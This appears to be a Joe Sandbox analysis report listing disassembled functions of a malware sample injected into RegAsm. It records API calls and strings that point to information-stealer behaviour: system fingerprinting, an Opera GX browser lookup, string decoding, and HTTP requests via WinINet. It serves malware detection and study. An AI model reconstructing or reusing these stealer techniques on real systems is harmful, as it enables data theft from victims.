Instruction Fuzzy Hash: 29014FB990421CBFDB10DB90DC89EEABB7CEB14308F1000A1B645E2052DA745FC49B60

Function 00410C2A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,004277B0,00000000,?,Work Dir: In memory,00000000,?,00427798), ref: 00410C38
HeapAlloc.KERNEL32(00000000), ref: 00410C3F
GlobalMemoryStatusEx.KERNEL32 ref: 00410C5F
wsprintfA.USER32 ref: 00410C85

Strings

%d MB, xrefs: 00410C7F
@, xrefs: 00410C58

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 3644086013-3474575989
Opcode ID: 8e8a7a8245d52d312849b1583ac2cc168249230b9d7192060ef0f8535f2c5250
Instruction ID: 7f0993dd9c2ffe4b015700b7abf3cd034eaddb2dc68ea974e4d022404329362e
Opcode Fuzzy Hash: 8e8a7a8245d52d312849b1583ac2cc168249230b9d7192060ef0f8535f2c5250
Instruction Fuzzy Hash: E8F036B5650208ABE704ABE4DC4AFBE76BDE746705F400119F712D62D0D6B4D881C765

Function 004185BA Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041869A: LoadLibraryA.KERNEL32(kernel32.dll,004185CC), ref: 0041869F
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 004186E4
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 004186FB
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 00418712
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 00418729
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 00418740
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 00418757
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 0041876E
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 00418785
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 0041879C
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 004187B3
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 004187CA
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 004187E1
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 004187F8
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 0041880F
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 00418826
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 0041883D
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 00418854
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 0041886B
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 00418882
Part of subcall function 0041869A: GetProcAddress.KERNEL32 ref: 00418899
Part of subcall function 0041869A: LoadLibraryA.KERNEL32 ref: 004188AA
Part of subcall function 0041869A: LoadLibraryA.KERNEL32 ref: 004188BB

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00410874: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004185DE,00427727), ref: 00410880
Part of subcall function 00410874: HeapAlloc.KERNEL32(00000000,?,?,?,004185DE,00427727), ref: 00410887
Part of subcall function 00410874: GetUserNameA.ADVAPI32(00000000,?), ref: 0041089B

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

CloseHandle.KERNEL32(00000000), ref: 0041863F
Sleep.KERNEL32(00001B58), ref: 0041864A
OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00427BEC,?,00000000,00427727), ref: 0041865B
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00418671
CloseHandle.KERNEL32(00000000), ref: 0041867F
ExitProcess.KERNEL32 ref: 00418686

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
String ID:
API String ID: 1043047581-0
Opcode ID: 1a7e9ea83e3234cccc9cde954a547afb6db7b40e5ef2eb1cb2098f105e067bd0
Instruction ID: 6d156d036fe96b7e7e70b892c316d88ae4b3b951ff2fb7a0d91db6b5b418f641
Opcode Fuzzy Hash: 1a7e9ea83e3234cccc9cde954a547afb6db7b40e5ef2eb1cb2098f105e067bd0
Instruction Fuzzy Hash: A3115431840119BBDB15FBB2DD5ACEF777DAE51304710012EF612A2091EF786AC5CAA9

Function 00403A54 Relevance: 9.1, APIs: 6, Instructions: 56stringnetworkCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00403A59
??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
??_U@YAPAXI@Z.MSVCRT ref: 00403A94
??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackH_prologInternetlstrlen
String ID:
API String ID: 503950642-0
Opcode ID: 9371a65d5599c2181566ef029014c057d9db17b498a003d7d761c4013870893a
Instruction ID: 01f705e2e15f70f245ed7cc8f451b5194e621601c70e1f2a08f50f95c120b1d8
Opcode Fuzzy Hash: 9371a65d5599c2181566ef029014c057d9db17b498a003d7d761c4013870893a
Instruction Fuzzy Hash: CE112E71D00209ABCB14EFA5D845ADE7BB8EF05324F20422BE525E62D1DB785A86CB54

Function 00407025 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153libraryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040702A

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00426C24,?,?,?,00426C0B,?), ref: 004070E7

Part of subcall function 00410640: lstrlenA.KERNEL32(?,00000000,?,00417C9B,0042771F,0042771E,00000000,00000000,?,0041867E), ref: 00410649
Part of subcall function 00410640: lstrcpy.KERNEL32(00000000,00000000), ref: 0041067D

SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00426C28,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00426C1E), ref: 0040715F
LoadLibraryA.KERNEL32(00000000), ref: 0040717A

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004070DB, 004070E0, 004070FA

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 757424748-3463377506
Opcode ID: fac87ebcc209ea54f7a7a501ef55e47d1c2f57080fe001ff76c034f6789c4fe3
Instruction ID: cc7ca1d3c667a34b4870444778f3d5c13d7afaa36423fef07728526d69be5c5b
Opcode Fuzzy Hash: fac87ebcc209ea54f7a7a501ef55e47d1c2f57080fe001ff76c034f6789c4fe3
Instruction Fuzzy Hash: 3361C670805188EFEB15EBA1DE12AED7FB5AF15304F00506EF405731A2DB781A98DFA9

Function 004112F4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00415CF8,00000000,?,Windows: ,00000000,?,004277B0,00000000,?,Work Dir: In memory), ref: 00411308
HeapAlloc.KERNEL32(00000000,?,?,?,00415CF8,00000000,?,Windows: ,00000000,?,004277B0,00000000,?,Work Dir: In memory,00000000,?), ref: 0041130F
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00415CF8,00000000,?,Windows: ,00000000,?,004277B0,00000000,?), ref: 0041133D
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00415CF8,00000000,?,Windows: ,00000000,?,004277B0,00000000), ref: 00411359

Strings

Windows 11, xrefs: 00411320

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: 02a7e1be9f617237ab59f5d0b10bda14abe426e295889f75791bc81a74209b35
Instruction ID: 81b5230690fe81b1291c3a5823feff144b4a9c668a2fbb84713965f1a1fcd84b
Opcode Fuzzy Hash: 02a7e1be9f617237ab59f5d0b10bda14abe426e295889f75791bc81a74209b35
Instruction Fuzzy Hash: 29F0C279600208FBFB105B91DC0EFAB7ABEEB46B04F101025BB01DA5A0D7B09A90D724

Function 004107F9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0041086B,0041131C,?,?,?,00415CF8,00000000,?,Windows: ,00000000), ref: 0041080D
HeapAlloc.KERNEL32(00000000,?,?,?,0041086B,0041131C,?,?,?,00415CF8,00000000,?,Windows: ,00000000,?,004277B0), ref: 00410814
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0041086B,0041131C,?,?,?,00415CF8,00000000,?,Windows: ), ref: 00410832
RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0041086B,0041131C,?,?,?,00415CF8,00000000), ref: 0041084D

Strings

CurrentBuildNumber, xrefs: 00410845

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: df48fde353af032f330173ba9841880cfd06c9eb85138683e7bc6960902d4650
Instruction ID: 5820edbd9e35f09d420cd177fd830d214edc8d9f1d5c5400d52d891924be62bb
Opcode Fuzzy Hash: df48fde353af032f330173ba9841880cfd06c9eb85138683e7bc6960902d4650
Instruction Fuzzy Hash: 04F03079644208BBEB115B90DD4FFEE7A7DEB46B05F201019F701A90A1DBB059809764

Function 004024D7 Relevance: 7.5, APIs: 5, Instructions: 39memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004024F0

Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1

strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
RtlAllocateHeap.NTDLL(00000000), ref: 00402517

Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D

memset.MSVCRT ref: 00402540

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
String ID:
API String ID: 3248666761-0
Opcode ID: 03db76fd6878907fd770f1a5e9d4f825eee7d0a953eb3d2b63cebd0c09c03629
Instruction ID: e725b6874ab6413f94fe46dceb341e14228d32bcbb8a04e4f5351715f98a7e37
Opcode Fuzzy Hash: 03db76fd6878907fd770f1a5e9d4f825eee7d0a953eb3d2b63cebd0c09c03629
Instruction Fuzzy Hash: 81F044B2C44118B7CB10FBA4DD45FCA777C9F14305F0000A2F945E2082D9B89BC58BA4

Function 0040E1FC Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 455COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E201

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

StrCmpCA.SHLWAPI(00000000,Opera GX,00426CA2,00426C9F,?,?,?), ref: 0040E24B

Part of subcall function 004119CA: SHGetFolderPathA.SHELL32(00000000,00426D17,00000000,00000000,?), ref: 004119FB

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00411986: _EH_prolog.MSVCRT ref: 0041198B
Part of subcall function 00411986: GetFileAttributesA.KERNEL32(00000000,?,0040C604,?,00426CD2,?,?), ref: 0041199F

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040B3D5: _EH_prolog.MSVCRT ref: 0040B3DA

Strings

#, xrefs: 0040E717
Opera GX, xrefs: 0040E233

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: #$Opera GX
API String ID: 2625060131-1046280356
Opcode ID: 19e8936c8a6079dbc0a3736af480620359c468d112a2a02a50d5c05f48704585
Instruction ID: 9fa3da7a6afa5eb0eaba4bc7adc4ae0e3b97ae7ae9ec1e247c7334d5974b3b1d
Opcode Fuzzy Hash: 19e8936c8a6079dbc0a3736af480620359c468d112a2a02a50d5c05f48704585
Instruction Fuzzy Hash: 0802B771D0028CEADF05EBE5D956ADEBBB8AF14304F10405EF40573182DBB81B98DBA6

Function 1B3DFD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,?), ref: 1B3DFE03

Strings

winRead, xrefs: 1B3DFE3D
delayed %dms for lock/sharing conflict at line %d, xrefs: 1B3DFE78

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID: FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2738559852-1843600136
Opcode ID: 0f7dee453053ef467e6fc6d6b46571239f9367bcc16061f14313522b322dacdd
Instruction ID: dc63f14f77b0ce23b91f7f6f60f9a57fcdf8475e73097b48533638b4017f249d
Opcode Fuzzy Hash: 0f7dee453053ef467e6fc6d6b46571239f9367bcc16061f14313522b322dacdd
Instruction Fuzzy Hash: 2141D6B3A043456BD704EF68DDC19EBB7A9FFC4210FC40A2DF54486650E771E92887A2

Function 00413F49 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00413F4E
lstrlenA.KERNEL32(00000000), ref: 00413F6B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041402F

Strings

ERROR, xrefs: 00414029

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrlen
String ID: ERROR
API String ID: 2133942097-2861137601
Opcode ID: 3db94fc3efec1154c29e8a5f4f3eb54d0fddebed1ca6358556e1a37092b66524
Instruction ID: d310f47a96f8bbf2ba421b57c1c25c7638bce2ba58ff353f19b5c864dd6f07ca
Opcode Fuzzy Hash: 3db94fc3efec1154c29e8a5f4f3eb54d0fddebed1ca6358556e1a37092b66524
Instruction Fuzzy Hash: F4319371D00248EFCB00EFB9C846BDD7FB8AB15348F10805EF505A7282DB789688CBA5

Function 00413C5D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00413C62

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C

